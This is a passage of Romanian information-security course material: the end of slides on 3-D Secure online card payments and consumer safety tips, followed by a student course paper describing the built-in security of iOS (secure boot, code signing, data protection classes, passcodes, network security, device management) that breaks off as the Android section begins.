• Pas 6 - MPI trimite Payer Authentication Request la ACS prin
echipamentul cumparatorului (PC, device mobil..).
• Pas 7 - ACS receptioneaza Payer Authentication Request

16
Pasi (2)

• Pas 8 - ACS autentifica cumparatorul utilizand procesele aplicabile


la PAN (password, chip, PIN, etc.) si formeaza Payer Authentication
Response message cu valorile corespunzatoere si il semneaza.
• Pas 9 - ACS returneaza Payer Authentication Response la MPI prin
device cumparator si trimite datele selectate la Authentication
History Server (AHS).
• Pas 10 – MPI receptioneaza Payer Authentication Response.
• Pas 11 - MPI valideaza semnatura Payer Authentication Response
(fie singur, fie prin pasarea mesajului la un server de validare)
• Pas 12 – Comerciantul incepe autorizarea cu propriul achizitor.

Dupa acest pas achizitorul face autorizarea cu un sistem (ex VisaNet)


si returneaza rezultatul comerciantului

17
Sfaturi utile

• Evitarea operatiunilor online banking si logarea la diferite conturi de


pe alte calculatoare decat cele personale;

• Nu se introduc date personale pe site-uri ce nu accepta legaturi


securizate;

• Atentie la phishing;

• La tranzactiile online acceptati daca se cere codul CVV, dar refuzati


tranzactia daca se cere codul PIN;

18
Baza legislativă

• Legea Republicii Moldova privind comerţul electronic, nr.284-XV din


22.07.2004:
- creează cadrul juridic pentru efectuarea comerţului electronic;

- stabilirea principiilor de reglementare şi susţinere de către stat a


activităţii în domeniul comerţului electronic;

- stabilirea regimului juridic al contractelor şi comunicărilor


electronice privind vînzarea bunurilor, executarea lucrărilor sau
prestarea serviciilor.
Tema: Securitatea platformelor mobile iOS și Android

Introducere
Informația este un produs care, ca și alte produse importante rezultate din activitatea umană, are
valoare pentru o organizație și în consecință, este necesar să fie protejată corespunzător.
Fiecare organizație își poate implementa propriul său sistem de asigurare a securității
informației. Un management al securității informației se realizează prin implementarea unui set
corespunzător de acțiuni care cuprinde politici, practici, instrumente și proceduri, structuri
organizaționale, precum și funcții software. Toate acțiunile trebuie prevăzute, definite și aplicate pentru
a asigura că sunt întrunite obiectivele specifice de securitate a organizației.
Deoarece dezvoltarea tehnologiilor este în continuă avansare, telefoanele mobile, tabletele și
laptopurile au devenit foarte răspîndite și comune. Puterea computațională a acestor dispozitive
continuă să crească, pe cînd ele devin mai mici și mai ușoare. Un spectru nou de produse mobile care
combină un șir de posibilități computaționale într-un singur dispozitiv este în curs de dezvoltare.
Aceste posibilități convergente mobile permit utilizatorilor să rămînă online, accesînd toate datele de
care dispun, ca poșta electronică și cotații la bursă chiar și în timpul mișcării.
Deși există multe avantaje evidente ale acestor dispozitive, ele de asemenea afectează procesele
tradiționale de business și din acest considerent este nevoie de acordat o importanță prioritară
securității. Organizațiile trebuie să fie preocupate de securitate, ce include furtul sau pierderea
dispozitivelor mobile folosite de angajați, scurgerea informațiilor corporative prin intermediul acestor
dispozitive, probabilitatea infectării cu viruși și o posibilă interceptare neautorizată a traficului. În timp
ce beneficiem de conviniențele și efeciențele aduse de noile tehnologii mobile, trebuie să fie elaborate
și implementate măsuri corespunzătoare de securitate pentru a contracara orice amenințări asupra
detelor senzitive introduse de utilizatorii dispozitivelor mobile.
În cadrul acestei lucrări de curs vor fi prezentate două dintre cele mai importante noțiuni care
caracterizează tehnologiile mobile moderne și anume platformele iOS și Android. Lucrarea își propune
să descrie cum asigură aceste platforme normele de securitate, ce măsuri sunt întreprinse pentru a
asigura confidențialitatea utilizatorilor și datelor acestora.
Securitatea iOS

Compania Apple a proiectat platforma iOS avînd la bază conceptul de securitate. Păstrarea
informației securizată pe dispozitivele mobile este foarte importantă pentru fiecare utilizator, indiferent
dacă el accesează informații corporative și personale sau păstrează fotografii personale, informații
bancare și adrese. Deoarece informația fiecărui utilizator este importantă, dispozitivele iOS sunt
proiectate să mențină un nivel înalt de securitate fără a compromite experiența utilizatorului.
Dispozitivele iOS oferă caracteristici stricte de securitate a tehnologiilor, dar totuși sunt ușor de
folosit. Dispozitivele sunt proiectate să asigure o transparență cît mai mare a securității. Multe
caracteristici de securitate sunt activate implicit și astfel departamentul IT nu trebuie să execute
configurări adăugătoare. Și unele caracteristici cheie, cum ar fi criptarea dispozitivului, nu sunt posibile
de configurat, deci utilizatorii nu le pot dezactiva din greșeală.
Pentru organizații, luarea în considerație a securității dispozitivelor iOS, este de mare ajutor să
înțeleagă cum lucrează caracteristicile încorporate de securitate pentru a oferi o platformă mobilă
sigură.
iPhone, iPad și iPod touch sunt proiectate cu nivele de securitate. Caracteristicile hardware și
firmware de nivel jos protejează împotriva programelor malițioase și a virușilor, pe cînd caracteristicile
de nivel înalt permit accesul securizat la informația personală și corporativă, previne utilizarea
neautorizată și ajută la contracararea atacurilor.
Modelul de securitate iOS protejează informațiile totodată permițînd utilizarea mobilă, aplicații
străine și sincronizarea. În mare parte sistemul se bazează pe principiile securizate de proiectare și în
multe cazuri, Apple a realizat lucru de proiectare adițional pentru a spori gradul de securitate, fără a
compromite utilizarea.
iOS se bazează pe aceleați tehnologii ca și OS X și beneficiază de ani de dezvoltare a securității.
Înbunătățirile continue și caracteristicile adiționale de securitate au permis departamentelor IT din
întreprinderile din lumea întreagă să adopte rapid și să suporte dispozitivele iOS în rețelele lor.

1.1 Arhitectura sistemului


Integrarea strînsă a hardware și software în dispozitivele iOS permit validarea activităților
pentru toate nivelele. De la pornirea inițială pînă la instalarea unui soft iOS, fiecare pas este analizat și
verificat pentru a asigura că fiecare activitate este de încredere și că folosește resursele în mod
corespunzător.
O dată ce sistemul lucrează, această arhitectură de securitate integrată depinde de integritatea și
fiabilitatea XNU, kernel-ul iOS. XNU impune caracteristici de securitate în timpul rulării și este
esențial în sporirea încrederei în funcțiile și aplicațiile de nivel înalt.
1.1.1 Pornire securizată
Fiecare pas al procesului de pornire (boot-up) conține componente ce sunt semnate criptografic
de către Apple pentru a asigura integritatea și purcede doar după verificarea lanțului de încredere.
Acesta include aplicații bootloader, kernel, extensiile kernel și banda firmware.
Cînd un dispozitiv iOS este conectat, procesorul de aplicații execută imediat codul de pe
memoria read-only, cunoscută ca Boot ROM. Acest cod imuabil este prevăzut în timpul fabricării
cipurilor și este implicit de încredere. Codul de Boot ROM conține cheia publică a Apple - Root CA,
care este folosită pentru a verifica dacă Bootloader (LLB) este semnat de către Apple înainte de a-i
permite să se încarce. Acesta este primul pas în lanțul de încredere, unde fiecare pas asigură faptul că
următorul este semnat de către Apple. Cînd termină LLB sarcinile sale, acesta verifică și rulează
următoarea etapă, iBoot, care, la rîndul său, verifică și rulează kernel-ul iOS.
Acest lanț de pornire securizat asigură că cele mai mici niveluri ale softului nu sunt alterate și
permite iOS să ruleze doar pe dispozitivele Apple validate.
Dacă un pas al acestui proces de pornire nu poate încărca sau verifica următorul, procesul de
boot-up este oprit și dispozitivul afișează ecranul de "Conectare la iTunes". Acesta este modul de
recuperare. Dacă Boot ROM nu este capabil de a încărca sau a verifica nici LLB, acesta pornește
modul DFU (Device Firmware Upgrade). În ambele cazuri, dispozitivul trebuie să fie conectat la
iTunes prin USB și trebuie să fie restabilite setările implicite.
1.1.2 Personalizarea softului de sistem
Apple lansează regulat actualizări de software pentru a răspunde preocupărilor de securitate ce
apar; aceste actualizări sunt furnizate pentru toate dispozitivele acceptate simultan. Utilizatorii primesc
notificările de actualizări iOS pe dispozitive și prin intermediul iTunes, și actualizările sunt livrate în
mod wireless, încurajînd adoptarea rapidă a remedierilor recente de securitate.
Procesul de boot descris mai sus asigură faptul că numai codul semnat de Apple poate fi instalat
pe un dispozitiv. Pentru a preveni dispozitivele de a fi retrogradate la versiuni mai vechi, care nu
dispun de cele mai recente actualizări de securitate, iOS utilizează un proces numit System Software
Personalization. Dacă retrogradările au fost posibile, un atacator care cîștigă posesia unui dispozitiv ar
putea instala o versiune mai veche de iOS și să exploateze o vulnerabilitate care a fost fixată în
versiunea mai nouă.
Actualizările softului iOS pot fi instalate folosind iTunes sau over-the-air (OTA) pe dispozitiv.
Cu iTunes, o copie completă a iOS este descărcată și instalată. Actualizările de soft OTA sunt oferite ca
delta pentru eficiența rețelei.
În timpul unei instalări sau modernizări iOS, iTunes (sau dispozitivul însuși, în cazul
actualizărilor de soft OTA) se conectează la serverul de instalare autorizat al Apple și trimite o listă de
măsurători criptografici pentru fiecare parte a instalației, care urmează să fie instalate (de exemplu
LLB, iBoot, kernel-ul, imagine OS), o valoare anti-replay aleatorie (Nonce), și ID-ul unic al
dispozitivului (ECID).
Serverul verifică lista prezentată de măsurători față de versiunile pentru care se permite
instalarea, iar în cazul în care se găsesc similarități, adaugă ECID la măsuratori și semnează rezultatul.
Setul complet de date semnate de pe server este trecut la dispozitiv ca parte a procesului de instalare
sau upgrade. Adăugarea ECID "personalizează" autorizația pentru dispozitivul solicitant. Autorizînd și
semnînd doar măsurătorile cunoscute, serverul asigură că actualizarea este exact așa cum a fost
furnizată de Apple.
Aceste etape asigură că autorizația este pentru un anumit dispozitiv și că o versiune veche a iOS
de la un dispozitiv nu poate fi copiată la altul. Nonce împiedică un atacator de a salva răspunsul
serverului și de a-l folosi pentru a retrograda un dispozitiv în viitor.
1.1.3 Semnarea codului aplicațiilor
Odată ce kernel-ul iOS s-a pornit, acesta controlează care dintre procesele și aplicațiile
utilizatorilor pot fi rulate. Pentru a se asigura că toate aplicațiile provin dintr-o sursă cunoscută și
aprobată și nu au fost modificate, iOS impune ca tot codul executabil să fie semnat utilizînd un
certificat emis de Apple. Aplicațiile prevăzute cu dispozitivul, cum ar fi Mail și Safari, sunt semnate de
către Apple. Semnarea obligatorie a codului extinde conceptul de lanț de încredere de la sistemul de
operare la aplicații și previne aplicațiile să încărce resurse nesemnate sau să folosească cod ce se
automodifică.
În scopul de a dezvolta și instala aplicații pe dispozitive iOS, dezvoltatorii trebuie să se
înregistreze la Apple și să se alăture programului iOS Developer. Identitatea reală a fiecărui
dezvoltator, fie el individ sau întreprindere, este verificată de Apple înainte de eliberarea certificatului
lor. Acest certificat permite dezvoltatorilor să semneze aplicații și să le prezinte la App Store pentru
distribuție. Ca urmare, toate aplicațiile din App Store au fost prezentate de către o persoană sau
organizație identificabilă, servind ca un factor de descurajare pentru crearea de aplicații malițioase. Ei
au fost, de asemenea, verificați de către Apple pentru a se asigura că aceștia operează așa cum este
descris și nu conțin erori evidente sau alte probleme.
Întreprinderile au, de asemenea, posibilitatea de a scrie aplicații pentru folosirea în cadrul
organizației lor și să le distribuie angajaților lor. Întreprinderile și organizațiile pot aplica la iOS
Developer Enterprise Program (iDEP), cu un număr DUNS. Apple aprobă aplicanții după verificarea
identității și eligibilității lor. Odată ce o organizația devine membră a iDEP, se poate înregistra pentru a
obține un profil de provizionare care permite aplicațiilor să ruleze pe dispozitive autorizate. Utilizatorii
trebuie să aibă profilul de provizionare instalat în scopul de a rula aplicațiile in-house.
Spre deosebire de alte platforme mobile, iOS nu permite utilizatorilor să instaleze aplicații
potențial malițioase nesemnate de pe site-uri web, sau să ruleze cod ce nu este de încredere. În timpul
rulării, semnătura cod verifică dacă toate paginile de memorie executabile sunt făcute ca acestea să
asigure că o aplicație nu a fost modificată de cînd a fost instalată sau actualizată ultima dată.
1.1.4 Securitatea procesului de runtime
Odată ce se verifică dacă o aplicație provine de la o sursă autorizată, iOS impune măsuri de
securitate pentru a se asigura că aceasta nu poate compromite alte aplicații sau restul sistemului.
Toate aplicațiile de la părți terțe sunt limitate de la accesul fișierelor stocate de alte aplicații sau
de la efectuarea de modificări pe dispozitiv. Acest lucru previne aplicațiile să colecteze sau să modifice
informațiile stocate de către alte aplicații. Fiecare aplicație are un director unic pentru fișierele sale,
care este atribuit aleatoriu atunci cînd aplicația este instalată. În cazul în care o aplicație de la părți terțe
are nevoie să acceseze informații altele decît cele proprii, face acest lucru doar prin utilizarea de API și
a serviciilor oferite de iOS.
Fișierele de sistem și resursele sunt protejate de aplicațiile utilizatorilor. Instrumentele care nu
sunt necesare, cum ar fi serviciile de autentificare de la distanță, nu sunt incluse în software-ul
sistemului, și API nu permite aplicațiilor să escaladeze privilegiile lor pentru a modifica alte aplicații
sau iOS în sine.
Accesul către aplicații de la părți terțe la informațiile și caracteristicile utilizatorului, cum ar fi
iCloud este controlată utilizînd drepturi declarate. Drepturile sunt perechi cheie / valoare, care sunt
conectate la o aplicație și permite autentificarea dincolo de factori de runtime, cum ar fi ID-ul unix al
utilizatorului. Deoarece drepturile sunt semnate digital, acestea nu pot fi schimbate. Drepturile sunt
utilizate pe scară largă de aplicațiile de sistem pentru a efectua operațiuni specifice privilegiate care în
caz contrar ar impune procesul de a rula ca root. Acest lucru reduce foarte mult potențialul de
escaladare privilegiată de către o aplicație de sistem compromisă.
În plus, aplicațiile pot efectua numai procesare de fond prin intermediul sistemului furnizat de
API. Acest lucru permite aplicațiilor să continue să funcționeze fără a dăuna performanței sau a a avea
un impact dramatic asupra bateriei. Aplicațiile nu pot partaja date direct unele cu altele; partajarea
poate fi implimentată doar de către ambele aplicații simultan, utilizînd scheme personalizate.
Address space layout randomization (ASLR) protejează împotriva exploatării de bug-uri ce
corup memoria. Aplicațiile implicite folosesc ASLR pentru a asigura că toate regiunile de memorie
sunt atribuite aleatoriu la pornire. În plus, locațiile librăriilor partajate de sistem sunt atribuite aleatoriu
la fiecare pornire a dispozitivului. Xcode, mediul de dezvoltare iOS, în mod automat compilează
programele de la părți terțe, cu sprijinul ASLR pornit.
Protecția ulterioară este asigurată de iOS folosind caracteristica ARM Execute Never (XN),
care marchează paginile de memorie ca neexecutabile. Paginile de memorie marcate atît ca inscriptibile
cît și ca executabile pot fi utilizate numai de către aplicații, în condiții strict controlate.
1.2 Criptarea și protejarea datelor
Lanțul de pornire securizat, semnarea codului și securitatea procesului de execuție, toate
contribuie la asigurarea faptului că doar aplicații și cod de încredere pot rula pe un dispozitiv. iOS are
caracteristici suplimentare de securitate pentru a proteja datele utilizatorului, chiar și în cazurile în care
alte părți ale infrastructurii de securitate au fost compromise (de exemplu, pe un dispozitiv cu
modificări neautorizate). Ca arhitectura sistemului în sine, aceste capabilități de criptare și protecție a
datelor folosesc nivele de hardware și tehnologii software integrate.
1.2.1 Caracteristici de securitate hardware
Pe dispozitive mobile, viteza și eficiența energiei sunt critice. Operațiunile criptografice sunt
complexe și pot introduce performanță sau probleme pentru baterie în cazul în care nu sunt concepute
și implimentate în mod corect.
Fiecare dispozitiv iOS are un motor de criptare AES 256 construit în calea DMA între stocarea
flash și memorie principală de sistem, determinînd criptarea fișierelor să fie extrem de eficientă.
Împreună cu motorul AES, SHA-1 este implementat în hardware, reducînd în continuare operațiile de
criptografie suplimentare.
ID-ul unic al dispozitivului (UID) și ID-ul de grup al dispozitivului (GID) sunt cheile AES 256-
bit fuzionate în procesorul aplicației în timpul fabricării. Nici un soft sau firmware nu le pot citi direct,
ei pot vedea doar rezultatele operațiunilor de criptare sau decriptare efectuate utilizîndu-le. UID este
unic pentru fiecare dispozitiv și nu este înregistrat de Apple sau de oricare dintre furnizorii săi. GID
este comun pentru toate procesoarele într-o clasă de dispozitive (de exemplu, toate dispozitivele care
folosesc Apple A5 cip), și este folosit ca un nivel suplimentar de protecție atunci cînd se livrează soft-
ul sistemului în timpul instalării și a restabilirii. Scrierea acestor chei în siliciu previne falsificarea sau
ocolirea lor și garantează că acestea pot fi accesate doar de motorul AES.
UID permite ca datele să fie criptografic legate de un anumit dispozitiv. De exemplu, ierarhia
cheilor ce protejează fișierele sistemului include UID, deci dacă cipurile de memorie sunt fizic mutate
de la un dispozitiv la altul, fișierele sunt inaccesibile. UID nu este legat de nici un alt identificator pe
dispozitiv.
În afară de UID și GID, toate celelalte chei criptografice sunt create de către generatorul de
numere aleatoare al sistemului (RNG), folosind un algoritm bazat pe Yarrow. Entropia sistemului este
colectată de la momentul întreruperii în timpul procesului de pornire și, în plus de la senzorii interni
odată ce aparatul s-a conectat.
Ștergerea sigură a cheilor salvate este la fel de importantă ca și generarea lor. Este deosebit de
dificil de a face acest lucru pe stocare flash, unde numărul mare de nivele ar putea să însemne mai
multe copii ale datelor ce trebuie să fie șterse. Pentru a rezolva această problemă, dispozitivele iOS
includ o caracteristică menită să securizeze ștergerea datelor numită Effaceable Storage. Această
caracteristică accesează tehnologia de stocare de bază (de exemplu, NAND) pentru a aborda în mod
direct și a șterge un număr mic de blocuri de la un nivel foarte scăzut.
1.2.2 Protecția fișierului de date
În plus față de funcțiile de criptare hardware integrate în dispozitive iOS, Apple folosește o
tehnologie numită Protecție de date pentru a proteja în continuare datele stocate în memoria flash pe
dispozitiv. Această tehnologie este proiectată cu dispozitive mobile, luîndu-se în considerare faptul că
acestea pot fi întotdeauna pornite și conectate la Internet, și pot primi apeluri telefonice, text sau e-
mailuri în orice moment.
Protecție de date permite unui dispozitiv să răspundă la evenimente cum ar fi apeluri telefonice
primite fără a decripta datele sensibile și a descărca informații noi în timp ce e blocat. Aceste
comportamente individuale sunt controlate prin atribuirea fiecărui fișier la o clasă.
Protecția datelor protejează datele din fiecare clasă în baza timpului cînd datele trebuie să fie
accesate. Accesibilitatea este determinată și de faptul că tastele de clasă au fost deblocate. Protecția de
date este pusă în aplicare prin construirea și gestionarea ierarhiei de chei, și se bazează pe tehnologii de
criptare hardware.
Prezentarea generală a arhitecturii
De fiecare dată cînd este creat un fișier pe partiția de date, Protecția datelor creează o cheie
nouă de 256-bit și o transmite către motorul hardware AES, care utilizează cheia pentru a cripta fișierul
așa cum este scris pe memorie flash folosind modul AES CBC.
Metadata tuturor fișierelor în sistemul de fișiere sunt criptate cu o cheie aleatoare, care este
creată atunci cînd iOS este instalat pentru prima dată sau cînd dispozitivul este distrus de către un
utilizator. Cheia fișierului de sistem este stocat în Effaceable Storage. Din moment ce este stocat pe
dispozitiv, această cheie nu este utilizată să păstreze confidențialitatea datelor, în schimb, este
concepută astfel ca să poată fi rapid ștearsă la cerere (de către utilizator, cu opțiunea "Erase all content
and settings" sau de către un utilizator sau administrator, care cer ștergerea de la distanță de pe un
server Mobile Device Management, Exchange ActiveSync, sau iCloud). Ștergerea cheiei în acest mod
face ca toate fișierele criptografice să fie inaccesibile.

Figura 1.2.2.1
1.2.3 Cod de acces
Prin stabilirea unui cod de acces pentru un dispozitiv, utilizatorul activează în mod automat
Protecția datelor. iOS suportă codurile de acces de patru cifre și de lungime arbitrară alfanumerică. În
plus față de deblocarea dispozitivului, un cod de acces prevede entropia pentru chei de criptare, care nu
sunt stocate pe dispozitiv. Acest lucru înseamnă că un atacator ce se află în posesia unui dispozitiv nu
poate obține accesul la date din anumite clase de protecție, fără coduri de acces.
Codul de acces este "încurcat" cu UID-ul dispozitivului, astfel încercările trebuie să fie
efectuate pe dispozitivul ce se află sub atac. Un număr mare de iterații este folosit pentru a face fiecare
încercare mai lentă. Numărul iterațiilor este calibrat astfel încît o încercare durează aproximativ 80
milisecunde. Acest lucru înseamnă că va dura mai mult de 5 ani și jumătate pentru a încerca toate
combinațiile de șase caractere a codului de acces alfanumeric cu litere mici și numere, sau 2 ani și
jumătate pentru un cod de acces de nouă cifre cu numere numai.
Pentru a descuraja atacurile asupra codului de acces, interfața iOS impune escaladarea întîrzierii
de la intrarea unui cod de acces invalid la ecranul de blocare. Utilizatorii pot alege de a șterge
dispozitivul automat după 10 încercări eșuate de introducere a codului de acces. Această setare este de
asemenea, disponibilă ca o politică administrativă prin Mobile Management Device (MDM) și
Exchange ActiveSync, și poate fi, de asemenea, setat la un prag inferior.
Crearea parolelor Apple ID puternice
ID-urile Apple sunt utilizate pentru conectare la un număr de servicii, inclusiv iCloud,
FaceTime, și iMessage. Pentru a ajuta utilizatorii să creeze parole puternice, toate conturile noi trebuie
să conțină următoarele atribute pentru parolă:
• Cel putin opt caractere
• Cel puțin o literă
• Cel puțin o literă majusculă
• Cel puțin un număr
• Nu mai mult de trei caractere identice consecutiv
• Să nu fie la fel cu numele de cont

Considerații pentru parolă


Dacă este introdusă o parolă lungă care
conține numai numere, pe ecranul de Lock este
afișată o tastatură numerică în loc de tastatură
completă. Un cod de acces mai lung poate fi
introdus mai ușor decît un cod de acces
alfanumeric mai scurt, în timp ce asigură
același nivel de securitate.

1.2.4 Clase
Atunci cînd este creat un fișier nou pe un dispozitiv iOS, lui îi este atribuită de către aplicație o
clasă care îl creează. Fiecare clasă utilizează politici diferite pentru a determina cînd datele sunt
accesibile. Clasele de bază și politicile sunt, după cum urmează:
Complete Protection
(NSFileProtectionComplete): Cheia clasei este protejată cu o cheie derivată din codul de acces
al utilizatorului și dispozitivul UID. La scurt timp după ce utilizatorul blochează un dispozitiv (10
secunde, dacă setarea Require password este Immediately), cheia clasei decriptată este eliminată,
făcînd toate datele din această clasă inaccesibile pînă utilizatorul introduce parola din nou. Aplicația de
Mail pune în aplicare Complete Protection pentru mesaje și atașamente. Aplicațiile care lansează
imagini și date de localizare sunt, de asemenea, stocate cu Complete Protection.
Protejat pînă este deschis
(NSFileProtectionCompleteUnlessOpen): Unele fișiere pot avea nevoie să fie scrise în timp ce
dispozitivul este blocat. Un bun exemplu în acest sens este un atașament e-mail ce se descarcă în
background. Acest comportament este realizat prin utilizarea criptografiei asimetrice curbe eliptice
(ECDH pe Curve25519). Împreună cu obișnuita cheie per-fișier, protecția datelor generează o pereche
de chei publice/private pentru fișier. Un secret partajat este calculat folosind cheia privată a fișierului și
cheia publică a clasei Protected Unless Open, a cărui cheie privată corespunzătoare este protejată cu
codul de acces al utilizatorului și UID-ul dispozitivului. Cheia per-file este împachetată cu hash-ul
acestui secret partajat și stocată în metadata fișierului, împreună cu cheia publică a fișierului, cheia
privată corespondentă este apoi ștearsă din memorie. Îndată ce fișierul este închis, cheia per-file este,
de asemenea, ștearsă din memorie. Pentru a deschide fișierul din nou, secretul partajat este re-creat
folosind cheia privaă a clasei Protected Unless Open și cheia publică efemeră a fișierului; hash-ul este
folosit pentru a desface cheia per-file, care este apoi folosită pentru a decripta fișierul.
Protected Until First User Authentication
(NSFileProtectionCompleteUntilFirstUserAuthentication): Această clasă se comportă în același
mod ca și Complete Protection, cu excepția faptului că cheia decriptată a clasei nu este ștearsă din
memorie atunci cînd dispozitivul este blocat. Protecția în această clasă are proprietăți similare pentru
decriptarea desktop full-disk și protejează datele de atacuri care implică o restartare.
No protection
(NSFileProtectionNone): Cheia acestei clase este protejată doar cu UID, și se păstrează în
Effaceable Storage. Aceasta este clasa implicită pentru toate fișierele care nu sunt atribuite unei clase
Data Protection. Din moment ce toate cheile necesare pentru a decripta fișiere în această clasă sunt
stocate pe dispozitiv, criptarea permite numai beneficiul de ștergere rapidă la distanță. Dacă unui fișier
nu îi este atribuită o clasă Data Protection, este încă stocată în formă criptată (așa cum sunt toate datele
pe un dispozitiv iOS).
iOS Software Development Kit (SDK) oferă o suită completă de API-uri, care fac mai ușor
adoptarea clasei Data Protection de către terțe părți și dezvoltatori in-house și asigurarea nivelului cel
mai înalt de protecție a datelor pentru aplicațiile lor. Data Protection este disponibilă pentru API de
fișier și baze de date, inclusiv NSFileManager, CoreData, NSData, și SQLite.

1.3 Securitate de rețea


În plus față de măsurile ce au fost luate de către Apple pentru a proteja datele stocate pe
dispozitive iOS, există multe măsuri de securitate de rețea pe care organizațiile le pot lua pentru a
proteja informații ce se deplasează la și de la un dispozitiv iOS.
Utilizatorii mobili trebuie să fie în măsură să acceseze rețele de informații corporative de
oriunde în lume, așa că este important să se asigure că sunt autorizați și că datele lor sunt protejate în
timpul transmisiei. iOS folosește și oferă acces de dezvoltator la protocoalele standard de rețea pentru
comunicări autentificate, autorizate, și criptate. iOS oferă tehnologii verificate și cele mai recente
standarde de securitate pentru a realiza aceste obiective de securitate, atît pentru conecții Wi-Fi cît și
pentru cele mobile.
Pe alte platforme, software-ul firewall este necesar pentru a proteja numeroasele porturi de
comunicare deschise. Deoarece iOS atinge o suprafață redusă de atac prin limitarea porturilor de
ascultare și eliminare a utilităților de rețea inutile, cum ar fi telnet, shells, sau un server web, nu are
nevoie de software-ul firewall. În plus, comunicarea folosind iMessage, FaceTime, și Apple Push
Notifications Server este complet criptată și autentificată.
1.3.1 SSL, TLS
iOS sprijină Secure Socket Layer (SSL v3), precum și Transport Layer Security (TLS v1.1,
TLS v1.2) și DTLS. Safari, Calendar, Mail, și alte aplicații Internet folosesc automat aceste mecanisme
pentru a activa un canal de comunicare criptat între dispozitive și servicii de rețea. API-uri de nivel
înalt (cum ar fi CFNetwork) fac mai ușor pentru dezvoltatori să adopte TLS în aplicațiile lor, în timp ce
API-uri de nivel scăzut (SecureTransport) furnizează control bun.
1.3.2 WI-FI
iOS sprijină protocoalele Wi-Fi, inclusiv WPA2 Enterprise, pentru a oferi acces autentificat la
rețele corporative fără fir. WPA2 Enterprise folosește criptare AES pe 128-bit, oferindu-le utilizatorilor
cel mai înalt nivel de asigurare că datele lor rămîn protejate atunci cînd se trimit și se primesc
comunicații printr-o conexiune Wi-Fi. Cu suport pentru 802.1X, dispozitivele iOS pot fi integrate într-o
amplă gamă de medii de autentificare RADIUS. Metodele de autentificare fără fir 802.1X acceptate de
iPhone și iPad includ EAP-TLS, EAP-TTLS, EAP-FAST, EAP-SIM, PEAPv0, PEAPv1, și LEAP.

1.4 Acces la dispozitiv


iOS sprijină politicile flexibile de securitate și configurațiile care pot fi ușor puse în aplicare și
gestionate. Acest lucru permite întreprinderilor să protejeze informațiile corporative și să se asigure că
angajații îndeplinesc cerințele, chiar dacă ei utilizează dispozitive personale.
1.4.1 Protecția codului de acces
În plus față de protecția criptografică, codurile de acces previn accesul neautorizat la interfața
dispozitivului. Interfata iOS impune controlul întîrzierilor după introducerea unui cod de acces nevalid,
reducînd dramatic eficacitatea atacurilor prin intermediul Lock screen. Utilizatorii pot opta pentru
ștergerea automată a dispozitivului după 10 încercări eșuate de introducere a parolei. Această setare
este disponibilă ca o politica administrativă și poate fi, de asemenea, setată la un prag inferior prin
MDM și Exchange ActiveSync.
În mod implicit, codul de acces al utilizatorului poate fi definit ca un cod PIN de patru cifre.
Utilizatorii pot specifica un cod de acces alfanumeric mai lung prin activarea Settings > General >
Passcode > Complex Passcode. Parolele mai lungi și mai complexe sunt mai greu de ghicit sau atacat și
sunt recomandate pentru utilizare în întreprinderi.
Administratorii pot impune cerințe complexe față de codul de acces și alte politici utilizînd
MDM sau Exchange ActiveSync, sau prin a cere utilizatorilor să instaleze manual profiluri de
configurare. Următoarele politici față de codul de acces sunt disponibile:
• Valoare simplă
• Necesită o valoare alfanumerică
• Lungime minimă a parolei
• Număr minim de caractere complexe
• Vîrstă maximă a codului de acces
• Istoria codului de acces
• Auto-Lock timeout
• Perioada de grație pentru blocarea dispozitivului
• Numărul maxim de încercări eșuate
1.4.2 Realizarea configurației
Un profil de configurare este un fișier XML care permite unui administrator să distribuie
informații de configurare pentru dispozitive iOS. Setările care sunt definite de un profil de configurare
instalat nu pot fi modificate de către utilizator. Dacă utilizatorul șterge un profil de configurare, toate
setările definite de profil sunt, de asemenea, eliminate. În acest fel, administratorii pot impune setări
prin legarea politicii de acces. De exemplu, un profil de configurare care oferă o configurație de e-mail
poate, de asemenea, să specifice o politică de acces la dispozitiv. Utilizatorii nu vor putea accesa e-
mail-ul dacă codurile lor de acces nu îndeplinesc cerințele administratorului.
Profilele de configurare pot fi semnate și criptate pentru a valida originea lor, asigura
integritatea lor, și proteja conținutul lor. Profilele de configurare sunt criptate folosind CMS (RFC
3852), ce suportă 3DES și AES-128.
Profilele de configurare pot fi, de asemenea, blocate la un dispozitiv pentru a preîntîmpina
complet ștergerea lor, sau pentru a permite ștergerea doar cu un cod de acces. Deoarece mulți utilizatori
din întreprinderi dețin personal dispozitivele lor iOS, profile de configurare care leagă un dispozitiv de
un MDM server poate fi eliminat, dar acest lucru va elimina, de asemenea, toate informațiile de
configurare gestionate, date și aplicații.
Utilizatorii pot instala profilele de configurare direct pe dispozitivele lor folosind iPhone
Configuration Utility. Profilele de configurare pot fi descărcate prin e-mail sau wireless folosind un
server MDM.
1.4.3 Managementul dispozitivelor mobile
iOS suport pentru MDM permite companiilor să configureze în mod sigur și să gestioneze
dezvoltările scalate pentru iPhone și iPad din organizațiile lor. Capabilitățile MDM sunt construite pe
tehnologiile iOS existente, cum ar fi Configuration Profiles, Over-the-Air Enrollment și serviciul Apple
Push Notification. Folosind MDM, departamentele IT pot înscrie dispozitivele iOS într-un mediu de
întreprindere, configura și actualiza setările în mod wireless, monitoriza respectarea politicilor
corporative, și chiar șterge sau bloca dispozitivele gestionate de la distanță.
1.4.4 Ștergere la distanță
Dispozitivele iOS pot fi șterse de la distanță de către un administrator sau utilizator. Ștergerea
instantă de la distanță se realizează prin eliminarea sigură a cheii de criptare a blocului de păstrare din
Effaceable Storage, făcînd toate datele imposibil de citit. Ștergerea de la distanță poate fi inițiată de
MDM, Exchange, sau iCloud.
Cînd este declansată ștergerea de la distanță de MDM sau iCloud, dispozitivul trimite o
confirmare și efectuează ștergerea. Pentru ștergerea de la distanță prin intermediul Exchange,
dispozitivul verifică utilizînd Exchange Server înainte de a efectua ștergerea.
Utilizatorii pot șterge, de asemenea, dispozitivele aflate în posesia lor folosind setările
aplicației. Și, după cum a fost menționat, dispozitivele pot fi setate pentru a șterge automat după o serie
de încercări eșuate de a introduce codul de acces.
2. Securitate Android
Android este o platformă mobilă modernă, care a fost proiectată pentru a fi cu adevărat
deschisă. Aplicațiile Android fac uz de hardware și software avansat, precum și date locale, expuse prin
intermediul platformei pentru a aduce inovație și valoare pentru consumatori. Pentru a proteja această
valoare, platforma trebuie să ofere un mediu de aplicație care asigură securitatea utilizatorilor, datelor,
aplicațiilor, dispozitivelor, și rețelelor.
Asigurarea unei platforme deschisă necesită o arhitectură de securitate robustă și programe
riguroase de securitate. Android a fost proiectat cu mai multe nivele de securitate, care oferă
flexibilitatea necesară pentru o platformă deschisă, oferind în același timp protecție pentru toți
utilizatorii platformei.
